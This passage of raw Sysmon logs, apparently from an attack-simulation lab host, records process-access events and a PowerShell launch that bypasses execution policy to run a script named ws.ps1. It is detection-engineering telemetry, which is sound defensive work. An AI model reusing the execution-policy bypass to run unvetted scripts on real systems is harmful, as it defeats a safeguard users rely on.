owerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.774{466BC892-F862-60EB-F97D-00000000CF01}96245604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.774{466BC892-F862-60EB-F97D-00000000CF01}96245604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.774{466BC892-F862-60EB-F97D-00000000CF01}9624ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf77bf5f.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.721{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.659{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.659{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.590{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.590{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.590{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.536{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.520{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.442{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.442{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.442{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.442{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.441{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.441{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.441{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.441{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001054784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.373{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001054783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.373{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=1BAD03CA3931966D8844C2E4D7C2B462,SHA256=2877D60F7760632BB56A991256120A7A99021E6F2BC7844553E8DAC6ABE30C3B,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001054782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.342{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\ws.ps1.lnk2021-07-12 07:57:26.859 23542300x80000000000000001054781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.342{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\ws.ps1.lnkMD5=1FB9D0C5368738163DC5B545A4AA36AD,SHA256=1926FDD24212F26A25F9A93489001D4F4C00E3A28BE89F6C40E7BA7EB272A24E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.289{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.289{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.274{466BC892-F862-60EB-FA7D-00000000CF01}1365944C:\Windows\system32\conhost.exe{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.242{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F862-60EB-FA7D-00000000CF01}136C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.238{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.238{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.238{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.238{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.237{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.237{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001054770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:02.220{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\ws.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 10341000x80000000000000001054851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 